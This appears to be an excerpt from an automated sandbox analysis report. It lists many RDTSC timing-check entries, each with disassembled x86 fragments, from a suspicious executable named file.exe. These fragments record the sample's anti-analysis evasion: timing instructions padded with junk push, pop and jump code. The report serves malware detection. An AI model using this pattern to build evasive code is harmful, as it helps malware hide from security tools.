                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E07E second address: 52E082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E2F5 second address: 52E305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E59A second address: 52E5B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E5B7 second address: 52E5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E5BD second address: 52E5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E5C1 second address: 52E5EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95D5269632h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jo 00007F95D526962Ch 0x00000014 je 00007F95D5269626h 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E70F second address: 52E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F95D47CFB26h 0x0000000f jmp 00007F95D47CFB39h 0x00000014 jmp 00007F95D47CFB38h 0x00000019 popad 0x0000001a jc 00007F95D47CFB2Ch 0x00000020 jne 00007F95D47CFB26h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E75C second address: 52E764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E764 second address: 52E768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E768 second address: 52E76E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E87B second address: 52E87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5324DB second address: 5324E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5324E3 second address: 5324E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53208A second address: 53208E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53208E second address: 532094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5321F4 second address: 5321FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535512 second address: 53551D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53551D second address: 535523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535523 second address: 53552C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53552C second address: 53554A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F95D526962Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F32 second address: 534F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F3C second address: 534F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F45 second address: 534F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F54 second address: 534F68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F95D5269626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F95D5269626h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F68 second address: 534F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350BF second address: 5350C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350C9 second address: 5350EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F95D47CFB26h 0x00000008 jmp 00007F95D47CFB38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350EF second address: 535107 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F95D5269626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 jnc 00007F95D5269626h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53522E second address: 535238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535238 second address: 535279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F95D5269626h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F95D5269636h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539409 second address: 53940D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A8D second address: 538A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A92 second address: 538A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A9A second address: 538AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F95D526962Ch 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F95D5269626h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AB6 second address: 538ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538BED second address: 538BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538BF1 second address: 538BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538BF9 second address: 538C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95D526962Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538C0D second address: 538C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F95D47CFB28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jg 00007F95D47CFB26h 0x00000017 jmp 00007F95D47CFB31h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538DAE second address: 538DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538DB7 second address: 538DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F95D47CFB26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53911F second address: 53913C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F95D526962Eh 0x0000000d ja 00007F95D5269626h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F95D5269626h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53913C second address: 539159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F95D47CFB26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539159 second address: 53915D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C7B2 second address: 53C7EB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F95D47CFB37h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F95D47CFB33h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C7EB second address: 53C7FB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95D5269626h 0x00000008 jnp 00007F95D5269626h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C7FB second address: 53C812 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F95D47CFB32h 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0B28 second address: 4A0B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0B2E second address: 4A0B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0B3A second address: 4A0B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5418BA second address: 5418BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5418BE second address: 5418C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541A2E second address: 541A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541B7E second address: 541B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541B82 second address: 541BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F95D47CFB2Ah 0x0000000e pop edi 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541BA3 second address: 541BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B419 second address: 54B435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F95D47CFB37h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549497 second address: 54949F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54949F second address: 5494EF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D47CFB28h 0x00000008 jmp 00007F95D47CFB2Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007F95D47CFB2Ch 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F95D47CFB36h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F95D47CFB2Dh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5494EF second address: 5494F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549766 second address: 549776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB2Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549776 second address: 549780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549780 second address: 549784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549784 second address: 54978E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54978E second address: 5497A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F95D47CFB26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5497A3 second address: 5497C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269639h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5497C6 second address: 5497D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549DD0 second address: 549DE8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D5269626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F95D526962Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AEBF second address: 54AEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54AEC5 second address: 54AED2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540E4 second address: 5540E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540E9 second address: 5540EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540EE second address: 5540FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540FA second address: 554119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D5269639h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554119 second address: 55413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB2Ch 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F95D47CFB2Dh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55413D second address: 55415D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95D5269639h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5542D2 second address: 5542D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55445D second address: 554467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5545C3 second address: 5545C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5545C8 second address: 5545D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5545D2 second address: 5545D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556118 second address: 55611C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55611C second address: 556120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556120 second address: 556126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556126 second address: 55614D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F95D47CFB39h 0x0000000d jnp 00007F95D47CFB26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55614D second address: 556153 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE4F second address: 55DE60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Bh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE60 second address: 55DE65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE65 second address: 55DE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F95D47CFB2Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F95D47CFB32h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55DE8E second address: 55DE98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C548 second address: 55C559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95D47CFB2Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C69D second address: 55C6A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55C6A7 second address: 55C6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55CAEA second address: 55CB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F95D5269632h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F95D526962Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55CB0E second address: 55CB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F95D47CFB26h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55CC9D second address: 55CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55CDC2 second address: 55CE02 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D47CFB2Ch 0x00000008 jmp 00007F95D47CFB39h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F95D47CFB35h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D548 second address: 55D54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D54C second address: 55D558 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D558 second address: 55D55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D55C second address: 55D560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
